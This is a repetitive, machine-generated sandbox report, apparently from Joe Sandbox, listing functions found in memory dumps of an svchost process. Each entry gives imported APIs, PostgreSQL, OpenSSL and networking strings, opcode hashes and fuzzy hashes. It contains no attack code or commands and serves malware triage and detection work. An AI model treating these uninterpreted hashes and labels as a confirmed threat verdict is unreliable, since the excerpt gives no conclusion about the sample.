                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ErrorLastStartupmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4264553866-3916222277
                                                                                            • Opcode ID: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
                                                                                            • Instruction ID: 171d3acdac9b1ba98a1b24bd97eaeada4e89f4d5ccb22942e2423cdc1dcb1f86
                                                                                            • Opcode Fuzzy Hash: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
                                                                                            • Instruction Fuzzy Hash: 1641537270AB8186F7558F20E4693B923A5FB05B88F4C1139DE4D2A3D6DF7E91458318
                                                                                            Function 00007FFDA3736540 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$connect
                                                                                            • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                                            • API String ID: 375857812-3816509080
                                                                                            • Opcode ID: 81808cecde148e0314505d5bbdb3587760bc8037fb71c53ef54272281857020f
                                                                                            • Instruction ID: 813bada5fecc3fd054512e79c3d9b0d38fd8191ff24a5054c2ae97c0b286f497
                                                                                            • Opcode Fuzzy Hash: 81808cecde148e0314505d5bbdb3587760bc8037fb71c53ef54272281857020f
                                                                                            • Instruction Fuzzy Hash: 7B61E022B09A8281FBA49B35D4607F93362AB45BA4F544232DE6C1B7D7DF3EE445C304
                                                                                            Function 00007FFD9473E5D4 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                            • String ID:
                                                                                            • API String ID: 3215553584-0
                                                                                            • Opcode ID: d8c9c720c423dd0fb7c7fdef2e919f46d25ae73476d54887143296ce2eb2440e
                                                                                            • Instruction ID: dc4474ebf858d31d3d2bc60a5f24b3735f66906328149ad919200e550ccc2de2
                                                                                            • Opcode Fuzzy Hash: d8c9c720c423dd0fb7c7fdef2e919f46d25ae73476d54887143296ce2eb2440e
                                                                                            • Instruction Fuzzy Hash: BAC1C162B0C68AD1E7709B94A4B42BE7791FB82B80F658131DA4D07393DF7CE845C781
                                                                                            Function 00007FFDA36F4380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c, xrefs: 00007FFDA36F43DD
                                                                                            • (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D, xrefs: 00007FFDA36F43E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Last$CreateErrorFileStatus_wassert
                                                                                            • String ID: (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D$D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c
                                                                                            • API String ID: 4152205889-1407915
                                                                                            • Opcode ID: 13428a4a084adc298e55a553be0c416b07cc18ad2ad40da243f3966190fd6d86
                                                                                            • Instruction ID: 799ddef4fa6ee7ad8a701bb89003f1c538ca211c36d44faa79606e5bdfaff4aa
                                                                                            • Opcode Fuzzy Hash: 13428a4a084adc298e55a553be0c416b07cc18ad2ad40da243f3966190fd6d86
                                                                                            • Instruction Fuzzy Hash: F1415C23B0AA5546F7219B24E81236E3582F744774F485234DA6D937C2DF7ED8848748
                                                                                            Function 00007FFDA36F36A0 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$CloseHandleLastStatus
                                                                                            • String ID:
                                                                                            • API String ID: 573794993-0
                                                                                            • Opcode ID: 01925ca212a3f11562ca6d029b4d52a2f766c3a2ff5ed6290fc74fb45a60b174
                                                                                            • Instruction ID: a50180a470f66c1993389f0c38a7cdf438b683fd7307f040856b524a2cf82b22
                                                                                            • Opcode Fuzzy Hash: 01925ca212a3f11562ca6d029b4d52a2f766c3a2ff5ed6290fc74fb45a60b174
                                                                                            • Instruction Fuzzy Hash: E9310761B0BA4286F7249B2598282792262BF54770F686330EA3D537D2DF3DE490875C
                                                                                            Function 00007FFDA36E2E10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E24
                                                                                              • Part of subcall function 00007FFDA36EC3B0: Sleep.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3D2
                                                                                              • Part of subcall function 00007FFDA36EC3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3F0
                                                                                              • Part of subcall function 00007FFDA36EC3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC406
                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorInitializeLastSleepgetenv
                                                                                            • String ID: /share/locale$PGLOCALEDIR$libpq-16
                                                                                            • API String ID: 4109591470-900106006
                                                                                            • Opcode ID: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
                                                                                            • Instruction ID: f5e54a1aee03b490ee05ab7f209ae36d1f62311388d10a7f89a402f864c1f2cf
                                                                                            • Opcode Fuzzy Hash: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
                                                                                            • Instruction Fuzzy Hash: 34014B11F0B68381FA10AB14ACB127537A3BF59304F8C2075E04D663A7EE2EA5488348
                                                                                            Function 00007FFDA373ADE0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 232COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                                                                                            • API String ID: 0-551583306
                                                                                            • Opcode ID: 7d03435d41bbe7626240fee5d904c6f03834b88cc5d41ab480cb746a93afb826
                                                                                            • Instruction ID: 1c4626336a6198bcdcd7fc87f5cdd074f1fc2b22ce3d25b8ab25094a7860f35a
                                                                                            • Opcode Fuzzy Hash: 7d03435d41bbe7626240fee5d904c6f03834b88cc5d41ab480cb746a93afb826
                                                                                            • Instruction Fuzzy Hash: 74A1A062B0F38282FBA98B15946537937A2EB44B84F584035DE4D673D6DF3EE881C708
                                                                                            Function 00007FFDA3781D10 Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: callocfree
                                                                                            • String ID:
                                                                                            • API String ID: 306872129-0
                                                                                            • Opcode ID: 440052d8aa252fc403e1b18fb0074ef3cf7239a02d1e66a828f150907f6617e9
                                                                                            • Instruction ID: 198bc946ccc57847e9b56378aec73cf82e7e7cba7e99519167f305163bc720a6
                                                                                            • Opcode Fuzzy Hash: 440052d8aa252fc403e1b18fb0074ef3cf7239a02d1e66a828f150907f6617e9
                                                                                            • Instruction Fuzzy Hash: 1A616C32206BC186E3518F34D4583DA36A1EB45B6CF180338DAA95F7DADFBA9044C765
                                                                                            Function 00007FFDA3764470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateEventcallocfree
                                                                                            • String ID: d
                                                                                            • API String ID: 1150888495-2564639436
                                                                                            • Opcode ID: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                                                                                            • Instruction ID: 544fbcc5a78cc1e9a5f51b6609e45e48a97417d4c930af4fde46ded70f9c8f0f
                                                                                            • Opcode Fuzzy Hash: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                                                                                            • Instruction Fuzzy Hash: 3C311A32B1AB4192EB05EB20D4712F972A2FF98B44F840035DA4D5679BEF3DE905C758
                                                                                            Function 00007FFDA377ABE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59stringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessagestrchrwcstombs
                                                                                            • String ID: Unknown error
                                                                                            • API String ID: 4171340688-83687255
                                                                                            • Opcode ID: d63315eb628f02752e1d799c39d56083ab3544685e630d18f0dd8773cc4336b0
                                                                                            • Instruction ID: d1d6791dcea3766e08ffb9f2be9365d5b17455297a0b11c3f4798e78b670e314
                                                                                            • Opcode Fuzzy Hash: d63315eb628f02752e1d799c39d56083ab3544685e630d18f0dd8773cc4336b0
                                                                                            • Instruction Fuzzy Hash: 3921C222B0D7C196F7B18B28A86437A76D2AF89794F444230CB9D137C6EFBED4008718
                                                                                            Function 00007FFD9473CFE8 Relevance: 6.2, APIs: 4, Instructions: 229COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFD94748C55,?,00007FFD9471A8D5,?), ref: 00007FFD9473D106
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: 4989929f418510be00eaad4ba0abfe9a455c1d8ff00d167898f5db528b5556ad
                                                                                            • Instruction ID: 00dbbdb464e502b3363561044307d075cf63522a02a85e53cb7f906fac673533
                                                                                            • Opcode Fuzzy Hash: 4989929f418510be00eaad4ba0abfe9a455c1d8ff00d167898f5db528b5556ad
                                                                                            • Instruction Fuzzy Hash: 9C91F762B2865AC5FB70DBA5A4F02BD37A0BB46B88F248135DD0E57686CF3CD445C340
                                                                                            Function 00007FFDA361EE40 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA3633F40: ENGINE_finish.LIBCRYPTO-3-X64(?,00007FFDA361EE67,?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA3633F72
                                                                                            • ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE6C
                                                                                            • OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE73
                                                                                            • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE81
                                                                                            • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE89
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: E_finishJ_nid2snR_fetchR_pop_to_markR_set_mark
                                                                                            • String ID:
                                                                                            • API String ID: 3538331334-0
                                                                                            • Opcode ID: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                            • Instruction ID: 1fce6e533522e7ce7785a34121d7cd3461e84b57540059be78eb489844ff5a33
                                                                                            • Opcode Fuzzy Hash: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                            • Instruction Fuzzy Hash: 40F0A011B0B34203F954A762656516D85929F8CBC4F0C64B8FE4D67B8BEE2EE8510308
                                                                                            Function 00007FFDA378C9C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                                                                            • API String ID: 0-3791222319
                                                                                            • Opcode ID: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                                                                                            • Instruction ID: af150c2db75bbcaa7aa5451893fc14f8eb642c0689aed1423c9c1a27d2728cb6
                                                                                            • Opcode Fuzzy Hash: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                                                                                            • Instruction Fuzzy Hash: D541F722B0EA8382FA10DA265160279B692AF40BE5F144631DF6D573D7DE3FE4818705
                                                                                            Function 00007FFD946964F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                            • String ID: x816796
                                                                                            • API String ID: 2371198981-64559503
                                                                                            • Opcode ID: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                                                                                            • Instruction ID: 457ba3433980566019fe72333cbbbf70d19a8aaf47175c9a11d7073fe6dae1d0
                                                                                            • Opcode Fuzzy Hash: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                                                                                            • Instruction Fuzzy Hash: B03191A2F0674181EA69DBA5D1A03A82290AF55BF4F248731DA7D437D6EEB8D4D2C340
                                                                                            Function 00007FFDA36D65B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathmemset
                                                                                            • String ID: %s/postgresql
                                                                                            • API String ID: 2932979005-376571750
                                                                                            • Opcode ID: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                                                                                            • Instruction ID: 62f96abe3b392e60793fbcbc591a5ea19d711952cfa6685da60913822632a053
                                                                                            • Opcode Fuzzy Hash: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                                                                                            • Instruction Fuzzy Hash: 9E01883371AA8182FB609B61F4617EA6362EB897C4F886031D94D17B56CE3DD105CB04
                                                                                            Function 00007FFDA37387E0 Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
